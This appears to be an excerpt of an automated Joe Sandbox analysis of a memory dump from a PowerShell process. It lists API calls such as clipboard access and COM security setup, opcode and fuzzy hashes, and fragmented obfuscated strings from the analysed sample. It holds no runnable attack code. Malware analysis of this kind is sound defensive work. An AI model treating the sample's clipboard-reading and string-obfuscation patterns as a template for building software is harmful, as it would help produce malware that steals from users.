                                                                                                                                    • Instruction ID: 88ab58616cf1dac6cba617d780c76543ffdeb80aa514c7c7d0db7b6f6353d972
                                                                                                                                    • Opcode Fuzzy Hash: 398b2808b458341c98a87bf67e0231988ff1e1ff89b83f4d85f076abaf8bf248
                                                                                                                                    • Instruction Fuzzy Hash: 0FF09EB8509342CFD394DF64C5A875BBBE0EB89348F01891CE4998B391DBB59548CF82
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2797030083.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_400000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BlanketProxy
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3890896728-0
                                                                                                                                    • Opcode ID: c776e90b0c9c6af7e86a6e6b759a0e1348666aeaad21731c063a5846b902e991
                                                                                                                                    • Instruction ID: d25a5440729caa6a4a41176679ca809818bf9cac461bb09e9bc77660d505e8e6
                                                                                                                                    • Opcode Fuzzy Hash: c776e90b0c9c6af7e86a6e6b759a0e1348666aeaad21731c063a5846b902e991
                                                                                                                                    • Instruction Fuzzy Hash: 56F0D4B45093019FD314DF29D16871ABBF4FB88304F01991CE49ACB790C7B5AA48CF82
                                                                                                                                    APIs
                                                                                                                                    • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2797030083.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_400000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Initialize
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2538663250-0
                                                                                                                                    • Opcode ID: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
                                                                                                                                    • Instruction ID: e03bcfaf696d6c281ff3d22d3b8d0c31e3889364fa9117d67ae1079de8c3c82d
                                                                                                                                    • Opcode Fuzzy Hash: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
                                                                                                                                    • Instruction Fuzzy Hash: 43D0A7B557050867D2086B1DDC4BF22772C8B83B66F50423DF2A7C61D1D9506A14CA79
                                                                                                                                    APIs
                                                                                                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C595
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2797030083.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_400000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeSecurity
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 640775948-0
                                                                                                                                    • Opcode ID: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
                                                                                                                                    • Instruction ID: 58e2b5502705141ff0d3aa7c975cc0701997441b8ab7d7d43dac110591522243
                                                                                                                                    • Opcode Fuzzy Hash: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
                                                                                                                                    • Instruction Fuzzy Hash: F1D0C9B47D83407AF5749B08AC17F143210A702F56F740228B363FE2E0C9E172018A0C
                                                                                                                                    APIs
                                                                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?,0043C1D6,?,0040B2E4,00000000,00000001), ref: 0043AABE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2797030083.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_400000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                    • Opcode ID: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
                                                                                                                                    • Instruction ID: 16971ee2c2e030bf17817a0d81dc477e65560ccac1e7abaabcdfe7fdc6775186
                                                                                                                                    • Opcode Fuzzy Hash: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
                                                                                                                                    • Instruction Fuzzy Hash: B2D01231505522EBC6102F25FC06B863A58EF0E761F0748B1B4006B071C765ECA186D8
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2797030083.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_400000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: !$*W.Y$+K!M$;[0]$>C7E$FOEH$NO$U'g)$UGBY$bweM$g#X%$l+X-$w?n!${7y9$$&$EG
                                                                                                                                    • API String ID: 0-3492884535
                                                                                                                                    • Opcode ID: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
                                                                                                                                    • Instruction ID: ba39798a3fcb6da663dd5afd8d89a9a5fc3f4f782173f0556435d4ff5b4d5338
                                                                                                                                    • Opcode Fuzzy Hash: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
                                                                                                                                    • Instruction Fuzzy Hash: A3E10EB4608350CFD7249F25E85176FBBF2FB86304F45896DE5D88B252D7388906CB4A
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2797030083.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_400000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1006321803-0
                                                                                                                                    • Opcode ID: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
                                                                                                                                    • Instruction ID: f2decc6a1db23371b8bb2cc1877cdad688787675f84f74fde2292b1bd35bf902
                                                                                                                                    • Opcode Fuzzy Hash: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
                                                                                                                                    • Instruction Fuzzy Hash: 855102F1D08A828FD700AF78C54936EFFA0AB15310F04863ED89597392D3BCA9598797
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2797030083.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_400000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocString
                                                                                                                                    • String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
                                                                                                                                    • API String ID: 2525500382-534244583
                                                                                                                                    • Opcode ID: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                                                                                                                    • Instruction ID: e21bf8ef08eaefae2f6608d65dd533aaf672cde794620ee92b713000d27e8169
                                                                                                                                    • Opcode Fuzzy Hash: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
                                                                                                                                    • Instruction Fuzzy Hash: 9981F52010CBC289D326C63C885875FBFD16BE7224F184B9DE1F58B3E6D6A98146C727
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2797030083.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_400000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Variant$ClearInit
                                                                                                                                    • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                                                                                                                    • API String ID: 2610073882-1095711290
                                                                                                                                    • Opcode ID: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
                                                                                                                                    • Instruction ID: 67e1650e07e25dd8c979730081919a9ec74336f1c366e84b3847a4c8d399cf69
                                                                                                                                    • Opcode Fuzzy Hash: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
                                                                                                                                    • Instruction Fuzzy Hash: 19410921108BC1CED726CF388488646BFA16F66224F0886DDD8E54F3DBC775D51AC7A6
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2797030083.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_400000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Variant$ClearInit
                                                                                                                                    • String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
                                                                                                                                    • API String ID: 2610073882-1095711290
                                                                                                                                    • Opcode ID: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                                                                                                                    • Instruction ID: 5aee6742307bd22be2b72699ebf7517107c7abda4f37a595e92ffc77e439cf83
                                                                                                                                    • Opcode Fuzzy Hash: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
                                                                                                                                    • Instruction Fuzzy Hash: 34410820108BC1CED726CF3C9488616BFA16B66224F488ADDD8E54F3DBC375D51ACB66
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2797030083.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_400000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitVariant
                                                                                                                                    • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                                                                                                                    • API String ID: 1927566239-3011065302
                                                                                                                                    • Opcode ID: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
                                                                                                                                    • Instruction ID: 53b19800ce9beadd92bbeaf8c0dd5e513984ffb5c5a49c85e3815ab243118963
                                                                                                                                    • Opcode Fuzzy Hash: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
                                                                                                                                    • Instruction Fuzzy Hash: 0541097010C7C18AD365DB28849878BBFE16B96314F885A9CE6E94B3E2C7798409C757
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2797030083.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_400000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitVariant
                                                                                                                                    • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                                                                                                                    • API String ID: 1927566239-3011065302
                                                                                                                                    • Opcode ID: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
                                                                                                                                    • Instruction ID: f917ff13e8fa353cdd9af704c32342f25a9e0069aca0bae3d4b305f03d6e9fde
                                                                                                                                    • Opcode Fuzzy Hash: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
                                                                                                                                    • Instruction Fuzzy Hash: F841187000D7C18AD3619B28849874FBFE06BA7324F885A9DF6E84B3E2C77984498757
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2797030083.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_400000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Variant$ClearInit
                                                                                                                                    • String ID: A$e$e$n$p$p$v$w$z$z
                                                                                                                                    • API String ID: 2610073882-1114116150
                                                                                                                                    • Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                                                                                                                    • Instruction ID: 776134ba1da329d7d35a817d8e2b42585fa70f537528e7a9cdeab4ed979499a7
                                                                                                                                    • Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                                                                                                                    • Instruction Fuzzy Hash: 2641383160C7C18ED331DB38885879BBFD1ABA6324F088AADD4E9872D6D7794505C763